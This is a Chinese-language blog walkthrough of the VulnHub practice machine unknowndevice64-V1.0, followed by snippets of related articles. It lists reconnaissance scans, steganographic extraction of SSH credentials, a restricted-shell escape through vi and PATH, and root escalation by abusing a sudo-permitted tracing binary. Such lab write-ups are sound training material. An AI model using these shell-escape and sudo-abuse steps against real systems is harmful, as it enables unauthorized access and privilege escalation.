vulnhub系列:unknowndevice64-V1.0

最新推荐文章于 2024-08-09 23:16:30 发布
最新推荐文章于 2024-08-09 23:16:30 发布
阅读量194 收藏 5
点赞数 2
分类专栏: vulnhub系列 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jq_j37/article/details/141036614
版权

vulnhub系列:unknowndevice64-V1.0

靶机下载

一、信息收集

nmap扫描存活,根据mac地址寻找IP

nmap 192.168.23.0/24

image-20240808201309730

nmap扫描端口,开放端口:1337(ssh)、31337(http)

nmap 192.168.23.183 -p- -A -sV -Pn

image-20240808201430536

dirb目录扫描,没什么发现

dirb http://192.168.23.183:31337/

image-20240808201623745

访问31337端口,没什么发现

image-20240808201653909

f12查看源码,发现有一个图片 key_is_h1dd3n.jpg

image-20240808202730638

访问图片,上面写着 隐藏的秘密,可能是图片隐写

image-20240808202921930

将图片下载下来,在kali中使用 steghide 工具提取信息

steghide extract -sf key_is_h1dd3n.jpg

image-20240808204948267

显示需要密码,根据名字可以知道密码为 h1dd3n

h1dd3n

得到一个h1dd3n.txt

image-20240808205056174

查看文件内容,是 brainfuck 加密

image-20240808205133715

使用工具解密,得到账号密码

ud64:1M!#64@ud

image-20240808205610505

二、getshell

登录ssh

ssh ud64@192.168.23.183 -p 1337
1M!#64@ud

image-20240808205815958

发现很多命令被限制,是rbash的shell,双击tab键,查看可执行命令

image-20240808210017378

vi 和 export 命令可用

vi 绕过,还是有部分命令无法执行

vi
按shift+:
!/bin/bash

image-20240808210245091

export 配置环境变量绕过

export PATH=/usr/sbin:/usr/bin:/sbin:/bin

三、提权

查看当前权限

sudo -l

image-20240808210411496

sysud64 可以执行 root 权限的命令,直接尝试提权

sudo sysud64

image-20240808210754307

失败了,sysud64 -h 查看帮助

sudo sysud64 -h

可以使用

-o file        send trace output to FILE instead of stderr

尝试提权,提权成功

sudo sysud64 -o /dev/null /bin/bash

image-20240808212114864

三天三夜睡不着
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
unknowndevice64-V1.0靶机渗透测试
m0_64769218的博客
09-17 199
打开之后的文件信息为一种brainfuck的程序语言,使用在线工具https://copy.sh/brainfuck/,或者https://www.splitbrain.org/services/ook在线解密后即可获取到ssh的用户名和密码;提示需要密码,图片名称为 key_is_h1dd3n,那么密码就是 h1dd3n,成功提取出了h1dd3n.txt;使用sudo-l查看sudo权限,发现可以无密码登录sysud64。使用sudo sysud64 -h查看帮助消息,发现可以使用。
unknowndevice64-V1.0
weixin_52953960的博客
08-09 62
显示需要密码,根据名字可以知道密码为 h1dd3n,得到一个h1dd3n.txt。发现很多命令被限制,是rbash的shell,双击tab键,查看可执行命令。sysud64 可以执行 root 权限的命令,直接尝试提权。访问图片,上面写着隐藏的秘密,可能是图片隐写。查看文件内容,是 brainfuck 加密。失败了,sysud64 -h 查看帮助。vi 绕过,还是有部分命令无法执行。f12查看源码,发现有一个图片。访问31337端口,没什么发现。export 配置环境变量绕过。使用工具解密,得到账号密码。
unknowndevice64-V1.0靶机
最新发布
zdd1453691081的博客
08-09 104
【代码】unknowndevice64-V1.0靶机。
vulnhubunknowndevice64-V1.0渗透实战
weixin_43862283的博客
04-15 475
vulnhubunknowndevice64-V1.0渗透实战 0x01 环境及配置 难度:中级 目标:获取root权限并阅读/root/flag.txt 网络:桥接模式 DHCP自动分配IP地址 下载地址:https://mega.nz/#!WyQ1UaKC!azV9qvOXqzxOXFcE9qP15fQTEOWgr27plE0SmZTvGhk 靶机:192.168.34.152 攻击机:ka...
靶机渗透测试(unknowndevice64: 1)
@小张小张的博客
09-15 923
靶机渗透测试(unknowndevice64: 1): Vulnhub靶机 unknowndevice64: 1 靶机:修改靶机的网络配置为桥接模式。 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。 靶机难度:(中等) 目标:成功渗透进入靶机,获取root权限并且读取/root/flag.txt 。 渗透流程: 1.探测主机ip(netdiscover -i eth0 -r 网关) 2.nmap进行靶机端口服务扫描 nmap -sS -Pn -A -p- -n 靶机ip 发现
靶机渗透—unknowndevice64
ray_kong的博客
04-04 4430
渗透unknowndevice64下载地址渗透IP扫描端口扫描http端口访问ssh端口访问rbash逃逸提权 下载地址 download unknowndevice64 地址:https://www.vulnhub.com/entry/unknowndevice64-1,293/ 渗透 IP扫描 sudo arp-scan -l //确定靶机IP地址 扫描到的靶机IP地址是 192.168.10.129 端口扫描 sudo nmap -p- 192.168.10.129 //靶机开放端口 sud
VulnHub实战篇三:UD64靶机渗透记录
a1004070060的博客
04-08 363
0x01环境描述 靶机名称:unknowndevice64-1 下载地址:下载地址 攻击机ip:192.168.0.105 靶机ip:192.168.0.106(通过C段扫描获得) 渗透目标:提权至root并读取flag文件 0X02渗透过程 使用nmap扫描目标开放端口同时识别服务,使用命令如下。通过扫描我们发现了目标1337端口的http服务以及运行在31337端口的htt...
Unknowndevice64
weixin_43841336的博客
07-18 343
1.查找主机和端口 Nmap -sP 192.168.34.1/24扫描存活主机,并确认靶机(192.168.34.152) nmap -sV -p0-65535 192.168.34.152查看开发端口 访问下31337端口,是一个网站,查看源代码 有一个jpg图片,访问并下载下来,用steghide --extract -sf key_is_h1dd3n.jpg -p h1dd3n将图片隐藏信...
Vulnhub靶机实战——Matrix2
冠霖L的博客
11-10 1181
Matrix2靶机下载地址: https://download.vulnhub.com/matrix/matrix2-Unknowndevice64.ova 环境: VMware 15虚拟机软件 Matrix2靶机IP地址: 192.168.220.159 Kali的IP地址: 192.168.220.155 Matrix2靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.1...
《密码编码学与网络安全原理与实践》第九章 第十章 公钥密码学与密钥管理
m0_57291352的博客
08-09 595
原则上不能说传统密码优于公钥密码,也不能说公钥密码优于传统密码公钥密码学仅限于用在密钥管理和签名这类应用中与密钥分配中心的会话过程既不比传统密码中的那些过程更简单,也不比之更有效动机:简化密钥分配和管理、实现签名等功能不对称性是公钥最为重要的性质,可以用来保证“真实”性,“不可否认”性非对称密钥:两个密钥:公钥和私钥,用来实现互补运算,即加密和解密,或者生成签名与验证签名;公钥证书:认证机构将用户的姓名和公钥绑定在一起,用户用自己的私钥对数字文件签名后,可以通过证书识别签名者,因为签名者是唯一拥有与证书上对
网络安全入门教程(非常详细)从零基础入门到精通!
2301_77160226的博客
08-05 1037
网络安全领域犹如一座深邃的知识宝库,从零基础入门到精通是一段充满挑战但也充满收获的旅程。这不仅需要您对知识的不懈追求,更需要大量的实践与经验积累。希望本教程能够为您的网络安全学习之路点亮明灯,引领您在这个充满机遇与挑战的领域中稳步前行,最终成为一名优秀的网络安全专家,为构建安全的网络世界贡献自己的力量!
网络安全】本地文件包含及远程文件包含漏洞详解
goldfish8848的博客
08-05 867
开发人员将需要重复调用的函数写入一个文件,对该文件进行包含时产生的操作。这样编写代码能减少冗余,降低代码后期维护难度。保证网站整体风格统一:导航栏、底部footer栏等,把这些不会变的东西包含在一个文件中,可以保证整体效果的统一和代码量的减少。
《密码编码学与网络安全原理与实践》第四章第六章第七章 对称加密体制
m0_57291352的博客
08-06 913
对称加密包括分组密码和流密码分组密码:信息被分块(block)进行加密和解密,连续的明文元素使用相同的密钥K来加密,密文C=c1c2…=EK(m1)EK(m2)…C =c_1c_2…=E_K(m_1)E_K(m_2)…C=c1​c2​…=EK​(m1​)EK​(m2​)…。分组密码可以看作是一个字符长度很大代换——如64比特或更多。大部分的分组对称密码都基于Feistel结构。可逆变换是必要条件。设计”安全”的密码算法不难,只要使用足够多的轮数就可以,但降低速度,因此所有问题就是平衡问题。流密码:流密码中按
网络安全】探索AI 聊天机器人工作流程实现RCE
等风来
08-06 188
我发现了一个广泛使用的AI聊天机器人平台中的远程代码执行漏洞。该漏洞存在于聊天机器人的自定义工作流响应代码中,这些工作流允许开发人员通过创建定制的流程来扩展机器人的功能。
国家网络安全战略如何保护个人信息安全
waitaikong_的博客
08-09 217
网络安全法》规定了个人信息的收集、使用、存储、传输等活动必须遵守法律法规,经过个人同意,并明确告知收集、使用的目的、方式和范围,同时应当保证个人信息的安全性,避免泄露、丢失或被篡改等情况发生。综上所述,国家网络安全战略的实施对个人信息安全产生了积极的影响,通过法律法规的完善、网络安全教育和培训的重视、关键基础设施的安全保护、国际交流与合作、数据分类分级保护以及数据安全风险管理等措施,有效地提高了个人信息的安全保护水平。通过对数据进行分类分级,可以采取不同的保护措施,确保不同级别的数据得到适当的保护。
企业产品网络安全日志0806
KD的疯狂实验室
08-06 250
默认 method,查询字符串 等会被屏蔽,你在日志中是找不到的。应该是为了隐私安全。启用方式依然是WAF面板配置日志CloudTrail的地方去掉你希望显示的所有共4个✓。采样:每一条WAF规则都会产生一个采样默认。你觉得是一个WAF,如果你有20条规则,到日志里就是20倍的量了。后果是:CloudTrail里数据量会暴增。特别是PutEvent的费用。
重庆市合川区第二届网络安全“钓鱼城“杯部分题解
m0_60894143的博客
08-09 355
下载文件后,进行分析往下划看见smb最开始以为是通过smb协议下载的文件找半天没发现,往前翻了翻,看见了flag存储为原始数据通过上述分析发现开头是pk,保存为zip压缩包发现需要密码感觉是伪加密使用工具一把梭再次打开压缩包就发现了flag证实了伪加密下载文件发现是内存文件直接工具分析volatility常规分析一波查看镜像信息分析进程发现没有异常查看cmd历史看到创建用户这个关键点先留意然后查看关键字发现有个zip直接导出到本地改为zip。
自学黑客(网络安全
热门推荐
2301_77160226的博客
08-05 1万+
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
怎么修复unknowndevice
09-11
修复 "unknowndevice" 的具体步骤会根据问题的性质和出现该问题的具体设备而有所不同。这是由于 "unknowndevice" 是一个比较宽泛的错误描述,可指示许多不同类型的问题。以下是一些可能的修复步骤: 1. 驱动程序...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值